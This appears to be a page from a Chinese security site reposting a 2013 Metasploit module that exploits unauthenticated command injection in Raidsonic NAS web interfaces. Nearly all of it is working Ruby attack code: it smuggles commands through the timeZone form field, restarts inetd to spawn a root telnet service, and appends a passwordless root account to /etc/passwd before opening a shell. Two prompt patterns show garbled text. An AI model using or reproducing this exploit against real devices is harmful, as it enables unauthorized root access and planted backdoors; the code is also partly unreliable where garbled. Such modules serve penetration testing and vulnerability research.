首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Raidsonic NAS Devices Unauthenticated Remote Command Execution
来源:metasploit.com 作者:vazquez 发布时间:2013-09-24  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking # It's backdooring the remote device

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::CommandShell
  include Msf::Exploit::FileDropper

  RESPONSE_PATTERN = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution',
      'Description' => %q{
        Different Raidsonic NAS devices are vulnerable to OS command injection via the web
        interface. The vulnerability exists in timeHandler.cgi, which is accessible without
        authentication. This module has been tested with the versions IB-NAS5220 and
        IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon
        configuration, this module is set to ManualRanking and could cause target instability.
      },
      'Author'      =>
        [
          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez' # minor help with msf module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'OSVDB', '90221' ],
          [ 'EDB', '24499' ],
          [ 'BID', '57958' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-010' ]
        ],
      'DisclosureDate' => 'Feb 04 2013',
      'Privileged'     => true,
      'Platform'       => 'unix',
      'Payload'     =>
        {
          'Compat'  => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find',
          },
        },
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0
      ))

    register_advanced_options(
      [
        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
      ], self.class)
  end

  def tel_timeout
    (datastore['TelnetTimeout'] || 10).to_i
  end

  def banner_timeout
    (datastore['TelnetBannerTimeout'] || 25).to_i
  end

  def exploit
    telnet_port = rand(32767) + 32768

    print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}")

    #first request
    cmd = "killall inetd"
    cmd = Rex::Text.uri_encode(cmd)
    print_status("#{rhost}:#{rport} - sending first request - killing inetd")

    res = request(cmd)
    #no server header or something that we could use to get sure the command is executed
    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end

    #second request
    inetd_cfg = rand_text_alpha(8)
    cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
    cmd = Rex::Text.uri_encode(cmd)
    print_status("#{rhost}:#{rport} - sending second request - configure inetd")

    res = request(cmd)
    #no server header or something that we could use to get sure the command is executed
    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end
    register_file_for_cleanup("/tmp/#{inetd_cfg}")

    #third request
    cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}"
    cmd = Rex::Text.uri_encode(cmd)
    print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")

    res = request(cmd)
    #no server header or something that we could use to get sure the command is executed
    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end

    #fourth request
    @user = rand_text_alpha(6)
    cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd"
    cmd = Rex::Text.uri_encode(cmd)
    print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}")

    res = request(cmd)
    #no server header or something that we could use to get sure the command is executed
    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
    end

    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
    ctx = { 'Msf' => framework, 'MsfExploit' => self }
    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i, 'Context' => ctx })

    if sock.nil?
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
    end

    add_socket(sock)

    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
    prompt = negotiate_telnet(sock)
    if prompt.nil?
      sock.close
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
    else
      print_good("#{rhost}:#{rport} - Telnet session successfully established...")
    end

    handler(sock)

  end

  def request(cmd)

    uri = '/cgi/time/timeHandler.cgi'

    begin
      res = send_request_cgi({
        'uri'    => uri,
        'method' => 'POST',
        #not working without setting encode_params to false!
        'encode_params' => false,
        'vars_post' => {
          "month"        => "#{rand(12)}",
          "date"         => "#{rand(30)}",
          "year"         => "20#{rand(99)}",
          "hour"         => "#{rand(12)}",
          "minute"       => "#{rand(60)}",
          "ampm"         => "PM",
          "timeZone"     => "Amsterdam`#{cmd}`",
          "ntp_type"     => "default",
          "ntpServer"    => "none",
          "old_date"     => " 1 12007",
          "old_time"     => "1210",
          "old_timeZone" => "Amsterdam",
          "renew"        => "0"
          }
        })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end

  def negotiate_telnet(sock)
    login = read_telnet(sock, "login: ___FCKpd___0quot;)
    if login
      sock.put("#{@user}\r\n")
    end
    return read_telnet(sock, "> ___FCKpd___0quot;)
  end

  def read_telnet(sock, pattern)
    begin
      Timeout.timeout(banner_timeout) do
        while(true)
          data = sock.get_once(-1, tel_timeout)
          return nil if not data or data.length == 0
          if data =~ /#{pattern}/
            return true
          end
        end
      end
    rescue ::Timeout::Error
      return nil
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Share KM 1.0.19 - Remote Denia
·IBM AIX 6.1 / 7.1 - Local root
·SolarWinds Server and Applicat
·Google Chrome 31.0 Webkit Audi
·MS13-071 Microsoft Windows The
·ZeroShell Remote Code Executio
·MS13-069 Microsoft Internet Ex
·Nodejs js-yaml load() Code Exe
·PCMAN FTP Server Post-Authenti
·Astium Remote Code Execution
·CA BrightStor ARCserve Tape En
·Blast XPlayer Local Buffer Ove
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved